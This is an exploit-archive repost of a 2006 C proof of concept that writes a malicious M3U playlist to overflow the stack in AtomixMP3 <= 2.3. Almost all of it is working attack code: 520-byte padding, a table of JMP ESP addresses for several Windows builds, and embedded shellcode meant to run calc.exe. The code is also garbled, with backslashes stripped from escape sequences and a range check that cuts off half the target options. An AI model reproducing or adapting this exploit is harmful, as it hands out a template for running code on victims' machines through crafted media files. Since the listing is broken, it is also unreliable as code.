[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AtomixMP3 <= 2.3 Malformed M3U Buffer Overflow Exploit
# Published : 2006-11-30
# Author : Greg Linares
# Previous Title : XMPlay 3.3.0.4 (ASX Filename) Local Buffer Overflow Exploit
# Next Title : Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)
/*
========================================================================
0-day AtomixMP3 <= v2.3 Malformed M3U Buffer Overflow PoC
========================================================================
AtomixMP3 Player/Mixer fails to properly handle large file paths inside
M3U files, the result is a stack based buffer overflow that allows an
attacker to execute code in the context of the player.
#EXTM3U
#EXTINF:0,TITLE
C: + [BUFFER x 520 bytes] + [JMP] + [SHELLCODE in ESP]
I tried finding a universal jump for this but due to restricted characters
all the jumps in XAudio.dll and the effects dll dont work.
Someone probably could find one if they tried hard ;)
Greets to everyone at EEye, Metasploit, Jerome Athias and Expanders :)
Happy Hunting and Happy Holidays to everyone
<insert super awesome leet ascii art here>
November 2006 - Month Of Greg's Media Player Exploits :)
(i'll probably continue it into December)
Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 11/30/2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[525];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
/* replace it with your own shellcode :) */
int JMP, x;
printf("n======================================================================n");
printf("AtomixMP3 <= v2.3 M3U Buffer Overflow Exploitn");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>n");
printf("Usage: %s <output M3U file> <JMP>n", argv[0]);
printf("n JMP Optionsn");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>n");
printf("5 = French Windows XP Pro SP2 <JMP ESP 0x77d8519f> n");
printf("6 = German/Italian/Dutch/Polish Windows XP SP2 <JMP ESP 0x77d873a0> n");
printf("7 = Spainish Windows XP Pro SP2 <JMP ESP 0x77d9932f> n");
printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 <JMP ESP 0x77e04c29>n");
printf("9 = French/Italian/Chineese Windows 2000 Server SP4 <JMP ESP 0x77df4c29>n");
printf("====================================================================nnn");
/* thanks metasploit and jerome for opcodes */
if (argc < 2) {
printf("Invalid Number Of Argumentsn");
return 1;
}
Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("nCouldn't Open File!");
return 1;
}
memset(buffer, 0, 520);
fputs("#EXTM3Urn#EXTINF:0,", Exploit);
fputs("0-day_AtomixMP3_M3U_Buffer_Overflow_Exploit_By_Greg_Linaresrn", Exploit);
fputs("C:\", Exploit);
for (x=0;x<520;x++) {
strcat(buffer, "A");
}
fputs(buffer, Exploit);
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...n");
fputs("xbcx41xdbx77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...n");
fputs("xfcx18xd7x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...n");
fputs("xdcx4axd7x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4 JMP...n");
fputs("x56xc2xe3x77", Exploit);
break;
case 5:
printf("Using French Windows XP SP 2 JMP...n");
fputs("x9fx51xd8x77", Exploit);
break;
case 6:
printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...n");
fputs("xa0x73xd8x77", Exploit);
break;
case 7:
printf("Using Spainish Windows XP SP 2 JMP...n");
fputs("x2fx93xd9x77", Exploit);
break;
case 8:
printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...n");
fputs("x29x4cxe0x77", Exploit);
break;
case 9:
printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...n");
fputs("x29x4cxdfx77", Exploit);
break;
}
fputs(scode, Exploit);
fputs("rn", Exploit);
printf("Exploit Succeeded...n Output File: %snn", argv[1]);
printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)n");
printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Coden");
fclose(Exploit);
return 0;
}
// www.Syue.com [2006-11-30]